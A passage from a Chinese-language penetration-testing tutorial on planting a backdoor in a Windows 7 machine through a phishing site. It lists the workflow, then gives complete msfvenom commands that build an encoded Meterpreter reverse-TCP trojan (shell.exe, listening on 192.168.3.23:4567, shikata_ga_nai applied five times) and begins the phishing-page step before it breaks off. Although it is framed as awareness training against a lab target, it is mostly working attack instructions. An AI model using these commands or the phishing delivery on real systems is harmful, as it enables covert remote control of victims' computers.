渗透测试window7，加强木马防范意识_防范意识测试

渗透测试window7，加强木马防范意识
通过钓鱼网站给win7系统植入后门并控制的流程
一、知识点总结：
1 生成后门程序
2 通过钓鱼方式植入木马靶机（社工）
3 使用Metasploit配置监控并控制靶机
4 控制靶机我们能做什么
二、用到的系统和工具：
1 Kali(系统)；
2 Windows7（靶机系统）；
3 Metasploit（渗透工具）；
4 msfvenom（Metasploit自带的后门生成模块）；
5 Meterpreter（后渗透常用通道）；
三、使用msfvenom开始生成木马
1 终端内输入: msfvenom -p windows/meterpreter_reverse_tcp LHOST={监控IP} LPORT={监控端口} -e x86/shikata_ga_nai -f exe -o new.exe -i 5
2 监控IP 查询方式 终端内输入：ip add 查到IP为192.168.3.23

3 监控端口选择一个没备占用的 这边使用：4567
4 -e = 使用 x86/shikata_ga_nai编码器
5 -f = 输出 exe 格式
6 -o 输出文件名和格式 我这边输出 shell.exe
7 -i 编码次数 我这边设置 5 次
8 自己组合命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.23 LPORT=4567 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5
操作截图：

后门生成完成
四、通过钓鱼方式植入木马靶机（社工）
1 使用HBuilder创建一个静态页面